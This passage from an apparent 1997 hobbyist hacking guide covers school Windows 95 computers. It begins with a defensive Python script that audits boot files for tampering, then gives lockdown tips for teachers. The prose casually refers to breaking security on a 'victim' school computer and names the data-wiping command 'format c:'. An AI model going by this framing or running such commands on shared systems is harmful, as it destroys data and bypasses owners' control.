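            words = words[1:]
            if not words:
                continue
        cmd = words[0].split("=", 1)[0].upper()        # handles PATH=... too
        if cmd == "REM" or cmd in BATCH_BUILTINS or cmd.startswith(":"):
            continue                                   # comment, builtin, label
        loads.append(_basename(words[0]))
    return loads


def audit(config_sys, autoexec, startup_items, expected, baseline):
    """Compare everything that loads at boot against expected and baseline sets."""
    found = {name for _, name in config_sys_loads(config_sys)}
    found |= set(autoexec_loads(autoexec))
    found |= {item.upper() for item in startup_items}
    want = {e.upper() for e in expected}
    known = {b.upper() for b in baseline}
    return {
        "loads": sorted(found),
        "missing": sorted(want - found),            # security entries removed
        "unknown": sorted(found - want - known),    # entries nobody accounted for
    }


if __name__ == "__main__":
    for label, bat in (("as installed", AUTOEXEC_BAT),
                       ("tampered", TAMPERED_AUTOEXEC)):
        r = audit(CONFIG_SYS, bat, STARTUP_ITEMS, EXPECTED, BASELINE)
        print(f"{label}: missing={r['missing']} unknown={r['unknown']}")
```

 Run it against copies of a lab machine’s own files (and its real Startup listing) with the baseline filled in once from a freshly set-up box; after that, a non-empty "missing" list means a security entry was edited out, and a non-empty "unknown" list is the short list of lines worth looking at, the same lines the Guide tells you to look for, only from the other side of the desk.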

***********************************************************
You can get punched in the nose note: Of course you could do something obvious like “format c:” and reinstall only what you want on that box. But this will make your teachers throw fits. Mega fits. If you want to be a hero, make sure that you can always return any school computer to the way it was before you hacked it.
***********************************************************

 When you are done, turn the victim computer off and then back on again instead of a reboot with power still on. This will get rid of anything lingering in RAM that could defeat your efforts.

Keep Clueless Kiddie Hackers from Messing up Your School Computers

 Now that you have shown your teachers that you can break absolutely any security on any box to which you have physical access, what next? Do you just leave your teachers feeling awed and helpless? Or do you help them?

 There is a reason why they have security systems on your school’s computers. You would be amazed at all the things clumsy or malicious users can do.

 You can do your school a world of good by using your hacking skills to fix things so that security works much better. Here are some basic precautions that you can offer to your teachers to lock down school computers. (See the GTMHH on how to break into Windows computers for instructions on how to do most of these.)

1) Disable all boot keys.
2) Password the CMOS. If it already has a password, change it. Give your teacher the new password.
3) Remove any programs that allow the user to get to regedit or dos.
4) Programs that allow hot keys to circumvent security should be changed, if possible, to disable them.
5) Remove programs that can’t be made safe.
6) Don’t make it possible for Win95 computers to access sensitive data on a network disk. (The passwords can be easily grabbed and decoded.)
7) Try really, really hard to persuade the school administration to replace Win95 with WinNT.

 With experimentation you will figure out much more for yourself.

 Since Win95 is a totally insecure operating system, this will be a losing battle. But at least you will be able to keep things secure enough that those students who do break in will know enough not to do anything disastrous by accident. As for malicious school hackers, sigh, there will always be kewl d00dz who think “format c:” shows they are, ahem, kewl d00dz.

 You may also have a problem with school administrators who may feel that it is inconvenient to set up such a secure system. They will have to give up the use of lots of convenient programs. Upgrading to WinNT will cost money. Try explaining to them how much easier it will be to keep those wannabe hacker vandals from trashing the school computers or using them to visit bianca’s Smut Shack.

 Are you ready to turn your hacking skills into a great reputation at school? Are you ready to have the computer lab teachers begging to learn from you? Are you ready to have the entire school computer system under your control -- legally? You will, of course, only use the tricks of this Guide under the supervision of an admiring teacher, right? It sure is more fun than expulsion and juvenile court!
___________________________________________________________
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message.
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
___________________________________________________________